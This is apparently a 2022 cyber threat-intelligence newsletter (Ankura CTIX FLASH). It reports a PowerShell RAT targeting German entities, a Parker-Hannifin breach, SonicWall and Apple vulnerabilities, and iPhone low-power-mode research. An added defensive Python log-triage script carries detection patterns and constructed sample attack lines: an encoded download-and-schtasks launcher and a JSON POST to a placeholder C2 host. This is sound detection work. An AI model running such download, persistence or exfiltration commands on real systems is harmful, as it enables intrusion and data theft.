German Entities Targeted with PowerShell RAT
Threat actors are actively targeting German entities with custom PowerShell payloads to gather information about the ongoing conflict between Russia and Ukraine. The malicious remote access trojan (RAT) is disguised as a downloadable reporting document on a clone site mimicking the official Baden-Württemberg website. Once the file is downloaded and opened, the user is shown a fake application error message while, in the background, a Base64-encoded PowerShell command reaches out to actor-controlled nodes of the fake website and downloads the associated payloads. When that completes, the files "MonitorHealth.cmd" and "Status.txt" are dropped onto the compromised system. The payload registers a scheduled task that executes "MonitorHealth.cmd" at a specific time each day to maintain persistence on the system. "Status.txt" is a PowerShell RAT that collects device information such as the current username, active working directory, and device hostname, all paired with a unique user identifier. This information is serialized as JSON and exfiltrated to threat actor endpoints via HTTP POST requests. Built-in checks allow the RAT to probe the anti-virus and security measures in its current environment, and it evades the Windows Antimalware Scan Interface (AMSI) with a bypass function script. Indicators show that one of the command-and-control nodes receiving the POSTed data is "kleinm[.]de". Current indicators do not tie any one actor to this PowerShell RAT; CTIX analysts continue to monitor chatter about this activity and will provide updates accordingly.
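The behaviours listed above (an encoded PowerShell launcher, a remote download, daily scheduled-task persistence, an AMSI bypass, and JSON exfiltration over HTTP POST) are all visible in PowerShell ScriptBlock and process-creation logging. The following triage script is an added example for defenders and is not code from the CTIX report or from any actor tooling: it decodes `-EncodedCommand` blobs (Base64 over UTF-16LE, which is what PowerShell expects), swaps the decoded script in for the blob, and scores each line against patterns derived from this item. The simplified log layout, the `C2-PLACEHOLDER.invalid` host, the pattern set and the sample lines are all constructed for the example.

```python
"""Triage PowerShell log lines for the RAT behaviours described above.

Added example, not code from the CTIX report or from any actor tooling.
Decodes -EncodedCommand blobs (Base64 over UTF-16LE), substitutes the decoded
script for the blob, then scores each line against behaviour patterns taken
from the report: remote download, scheduled-task persistence, AMSI references,
JSON/HTTP POST exfiltration and the dropped file names. Host names, the log
layout and the sample lines are constructed.
"""
import base64
import binascii
import re
from typing import Any, Dict, List, Optional

# Behaviour patterns (constructed for this example; tune before production use).
INDICATORS = {
    "download": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "sched_task": re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTask", re.I),
    "amsi_reference": re.compile(r"\bamsi\w*", re.I),
    "json_post": re.compile(r"ConvertTo-Json|-Method\s+Post", re.I),
    "dropped_files": re.compile(r"MonitorHealth\.cmd|Status\.txt", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used here only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Return the decoded script, or None if the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyse_line(line: str) -> Dict[str, Any]:
    """Decode any encoded command in the line and list the behaviours it exhibits."""
    text, decoded, hits = line, None, []
    m = ENCODED_FLAG.search(line)
    if m:
        hits.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            # Replace the blob with its plaintext so the patterns see the real
            # script and random Base64 characters cannot produce false matches.
            text = line[:m.start()] + " " + decoded + " " + line[m.end():]
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    hits.sort()
    return {"line": line, "decoded": decoded, "hits": hits, "score": len(hits)}


def triage(lines: List[str], threshold: int = 2) -> List[Dict[str, Any]]:
    """Return analyses of lines that match at least `threshold` behaviours."""
    return [r for r in (analyse_line(l) for l in lines) if r["score"] >= threshold]


# Constructed sample lines in a simplified "EventID Source: command" layout.
SAMPLE_LOGS = [
    # Encoded but benign: an administrator listing services.
    "4104 ScriptBlock: powershell.exe -NoProfile -EncodedCommand "
    + encode_command("Get-Service | Where-Object Status -eq 'Running'"),
    # Resembles the report's launcher: hidden window, download, daily task.
    "4688 Process: powershell.exe -w hidden -enc "
    + encode_command("Invoke-WebRequest -Uri http://C2-PLACEHOLDER.invalid/Status.txt "
                     "-OutFile Status.txt; schtasks /create /sc daily /st 09:00 "
                     "/tn Health /tr MonitorHealth.cmd"),
    # Plain-text block posting JSON and touching AMSI.
    "4104 ScriptBlock: $body = $info | ConvertTo-Json; "
    "Invoke-RestMethod -Uri http://C2-PLACEHOLDER.invalid/ -Method Post -Body $body # amsi",
    "4688 Process: notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    for result in triage(SAMPLE_LOGS):
        print(result["score"], result["hits"], result["line"][:50])
```

The benign encoded line scores 1 (encoding alone is common in administration tooling), the constructed launcher scores 4 and the JSON-POST block scores 2, so a threshold of 2 surfaces the two lines worth an analyst's attention while leaving the routine encoded command and the notepad process out. Decoding before matching matters: without it, the download and scheduled-task strings inside the Base64 blob would never be seen.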
Threat Actor Activity
Motion and Control Technologies Corporation Discloses Data Breach Impacting Employees, Dependents, and More
Parker-Hannifin, a corporation based in Ohio that specializes in motion and control technologies, recently disclosed a data breach that exposed the personal information of employees. According to Parker, an unauthorized third party had access to the corporation's IT systems between March 11 and March 14 and "may have acquired certain files" containing data pertaining to "current and former employees, their dependents, and members of Parker's Group Health Plans (including health plans sponsored by an entity acquired by Parker)." The data included names, Social Security numbers (SSNs), dates of birth, addresses, driver's license numbers, United States passport numbers, financial account information (such as bank account and routing numbers), enrollment information, health insurance plan member identification numbers, dates of coverage, and online account usernames and passwords. For a small portion of impacted individuals, the data also includes provider names, claims information, medical and clinical treatment information, and dates of service. The Conti ransomware group claimed responsibility on April 1, 2022, approximately one (1) month prior to Parker's data breach disclosure. The threat group initially posted 3% of the allegedly exfiltrated Parker data, followed by 100% of the 419 gigabytes (GB) of data on April 20, 2022. Full publications commonly occur when negotiations for the demanded ransom do not happen or when the threat group was never paid the ransom. CTIX analysts will continue to track Conti's activity.
- BleepingComputer: Parker Data Breach Article
- Cision PR Newswire: Parker Data Security Incident Notice
Critical Vulnerabilities in SonicWall VPN Appliances Allow for Remotely Bypassing Authentication
SonicWall identified a set of three (3) vulnerabilities affecting their SSLVPN Secure Mobile Access (SMA) 1000 series appliances, with one (1) of the flaws being deemed critical. The critical vulnerability, tracked as CVE-2022-22282, has been patched and is described as an unauthenticated access control bypass that could allow an unauthenticated remote attacker to slip past the authentication mechanism to gain access to internal resources, ultimately compromising the device to move laterally across the network. SMA 1000 SSLVPN products are deployed in many corporate networks across the world to streamline and secure remote access to enterprise resources in both local and cloud environments. At the time of this publication, there is no evidence that these vulnerabilities are being actively exploited; however, the exploit is extremely low-complexity and does not require the end-user to interact with the attack at all. Due to the simple nature of the exploit, CTIX analysts urge any administrators managing SMA 1000 series appliances to update their products immediately. Due to their popularity, being used by more than 500,000 business customers from 215 countries and territories, SMA appliances have been heavily targeted by ransomware threat actors in the past. The other two (2) medium severity vulnerabilities have yet to be patched, and administrators should be monitoring SonicWall's security notices for updates. The vulnerabilities affect SMA 1000 Series models: 6200, 6210, 7200, 7210, 8000v (ESX, KVM, Hyper-V, AWS, Azure). CTIX analysts will continue to monitor this matter for changes and, if warranted, will publish an update in future FLASH summaries.
Apple Patches Critical Vulnerability Exploited In-the-Wild
Apple has released an emergency security patch that addresses a critical zero-day vulnerability which may have been exploited in-the-wild, affecting macOS, watchOS, and tvOS. The flaw, tracked as CVE-2022-22675, is described as an out-of-bounds write vulnerability which could allow an attacker to execute arbitrary code with kernel level privileges following the compromise of mobile applications on the vulnerable device. Specifically, the exploit is due to a flaw in the Apple Audio Video Decode (AppleAVD) kernel extension (kext), which decodes multiple A/V encoding mechanisms like HEVC, H.265, and VP9. Apple stated in their security advisory that the vulnerability "may have been actively exploited," but did not provide additional details. Analysts assess that this is to allow as many Apple users as possible to update their vulnerable devices before the exploit becomes publicly known. According to Apple, the evidence suggests that the active exploits are very targeted, but they still state all users should consider updating their devices as soon as possible. The vulnerable operating system versions, as well as details about the patch, are available in the Apple advisory linked below.
Researchers Discover Vector to Implant Malware on iPhones While Device is Powered Off
Researchers from TU Darmstadt in Germany presented a novel way to infect an iPhone with malware while it is "off" at the ACM Conference on Security and Privacy in Wireless and Mobile Networks 2022 (WiSec 2022). The researchers determined that Apple's introduction of additional capabilities in Low Power Mode (LPM) generated this vulnerability. Specifically, the Bluetooth and Ultra-Wideband (UWB) chips are hardwired to the "Secure Element" (SE) in the NFC chip, giving the NFC, Bluetooth, and UWB chips access to information they would not normally have. LPM features are intended to increase user safety and convenience, for example, allowing Find My services to work even after shutdown through Apple's Bluetooth Low Energy (BLE)-based offline finding network. However, the researchers found that the Bluetooth firmware is "neither signed nor encrypted," allowing threat actors to overwrite the firmware and install their own malware. To do this, the attacker must exploit a flaw in the Bluetooth protocol, such as the Braktooth vulnerability discovered in September 2021. Because this vulnerability is hardware based, the issues presented by the researchers cannot be fixed with a system update. The researchers state the vulnerabilities associated with the new features will have "a long-lasting effect on the overall iOS security model." Due to the complexity of the attack and the short range of Bluetooth communications, the average iPhone user does not have to worry about these security issues, though sophisticated threat actors could use the technique against high-value targets.
The Ankura semi-weekly Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The following is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (firstname.lastname@example.org) if additional context is needed.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.